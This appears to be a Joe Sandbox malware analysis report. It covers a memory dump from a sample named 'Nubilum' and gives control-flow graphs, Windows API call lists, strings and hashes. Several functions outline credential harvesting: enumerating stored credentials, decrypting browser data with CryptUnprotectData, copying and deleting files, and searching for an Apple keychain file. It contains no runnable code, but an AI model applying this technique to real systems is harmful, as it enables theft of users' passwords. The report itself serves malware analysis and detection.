                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                          • String ID: dllhost.exe$p+vw@Fvw@Bvw$taskhost.exe$taskhostex.exe
                          • API String ID: 594330280-11196306
                          • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                          • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 586 413eb7-413ebd 583->586 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 586->587 588 413ebf-413ec6 ??3@YAXPAX@Z 586->588 590 413edb-413ee2 587->590 588->590 597 413ee4 590->597 598 413ee7-413efe 590->598 604 413ea2-413eae CloseHandle 592->604 595 413e61-413e68 593->595 596 413e37-413e44 GetModuleHandleW 593->596 595->592 601 413e6a-413e76 595->601 596->595 600 413e46-413e5c GetProcAddress 596->600 597->598 598->580 600->595 601->592 604->583
                          APIs
                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                          • memset.MSVCRT ref: 00413D7F
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                          • memset.MSVCRT ref: 00413E07
                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                          • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                          • API String ID: 912665193-1740548384
                          • Opcode ID: 660cab9a07f681a2bc4137dd77eea26a41ac751a59e67e4b34fef9630b289a87
                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                          • Opcode Fuzzy Hash: 660cab9a07f681a2bc4137dd77eea26a41ac751a59e67e4b34fef9630b289a87
                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 696 40b58d-40b59e 697 40b5a4-40b5c0 GetModuleHandleW FindResourceW 696->697 698 40b62e-40b632 696->698 699 40b5c2-40b5ce LoadResource 697->699 700 40b5e7 697->700 699->700 701 40b5d0-40b5e5 SizeofResource LockResource 699->701 702 40b5e9-40b5eb 700->702 701->702 702->698 703 40b5ed-40b5ef 702->703 703->698 704 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 703->704 704->698
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                          • memcpy.MSVCRT ref: 0040B60D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                          • String ID: AE$BIN
                          • API String ID: 1668488027-3931574542
                          • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                          • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                          APIs
                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                            • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                          • String ID:
                          • API String ID: 2947809556-0
                          • Opcode ID: 5668d0b7c5c9ca58d6e5ee57346aa2e448fecd31d747e20cfbee9aabcf780e2b
                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                          • Opcode Fuzzy Hash: 5668d0b7c5c9ca58d6e5ee57346aa2e448fecd31d747e20cfbee9aabcf780e2b
                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 767404330-0
                          • Opcode ID: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                          • Opcode Fuzzy Hash: 91f5c8417cc05eb5371089ee99512099cd95d68580e827c1857cd6a30ed1daf0
                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                          APIs
                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID:
                          • API String ID: 1690352074-0
                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                          APIs
                          • memset.MSVCRT ref: 0041898C
                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: InfoSystemmemset
                          • String ID:
                          • API String ID: 3558857096-0
                          • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                          • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                          APIs
                          • memset.MSVCRT ref: 004455C2
                          • wcsrchr.MSVCRT ref: 004455DA
                          • memset.MSVCRT ref: 0044570D
                          • memset.MSVCRT ref: 00445725
                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                            • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                            • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                            • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                            • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                          • memset.MSVCRT ref: 0044573D
                          • memset.MSVCRT ref: 00445755
                          • memset.MSVCRT ref: 004458CB
                          • memset.MSVCRT ref: 004458E3
                          • memset.MSVCRT ref: 0044596E
                          • memset.MSVCRT ref: 00445A10
                          • memset.MSVCRT ref: 00445A28
                          • memset.MSVCRT ref: 00445AC6
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                          • memset.MSVCRT ref: 00445B52
                          • memset.MSVCRT ref: 00445B6A
                          • memset.MSVCRT ref: 00445C9B
                          • memset.MSVCRT ref: 00445CB3
                          • _wcsicmp.MSVCRT ref: 00445D56
                          • memset.MSVCRT ref: 00445B82
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                          • memset.MSVCRT ref: 00445986
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                          • API String ID: 2151808875-3798722523
                          • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                          • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                            • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                          • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                          • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                          • String ID: $/deleteregkey$/savelangfile
                          • API String ID: 2744995895-28296030
                          • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                          • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                          Control-flow Graph

                          APIs
                          • memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                          • wcsrchr.MSVCRT ref: 0040B738
                          • memset.MSVCRT ref: 0040B756
                          • memset.MSVCRT ref: 0040B7F5
                          • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                          • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                          • memset.MSVCRT ref: 0040B851
                          • memset.MSVCRT ref: 0040B8CA
                          • memcmp.MSVCRT ref: 0040B9BF
                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                          • memset.MSVCRT ref: 0040BB53
                          • memcpy.MSVCRT ref: 0040BB66
                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                          • String ID: chp$v10
                          • API String ID: 580435826-2783969131
                          • Opcode ID: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                          • Opcode Fuzzy Hash: 544f7529f0c4d3a53e9c457f8d9cabf322a2e4b31897d0a2c4cc607292de5a12
                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 544 4094f7-4094fa call 424f26 540->544 542->509 544->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 559 4093e4-4093fb call 4253af * 2 555->559 557 4092bc 556->557 558 4092be-4092e3 memcpy memcmp 556->558 557->558 560 409333-409345 memcmp 558->560 561 4092e5-4092ec 558->561 559->544 569 409401-409403 559->569 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->544 570 409409-40941b memcmp 569->570 570->544 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->544 575 4094b8-4094ed memcpy * 2 572->575 573->544 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->544
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001C.00000002.1712019298.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001C.00000002.1712019298.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                          • String ID:
                          • API String ID: 3715365532-3916222277
                          • Opcode ID: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                          • Opcode Fuzzy Hash: 1c524b1582e21d5cf33c38ae172dfd569e4d92201c70e2bcc6981c46efb40b80
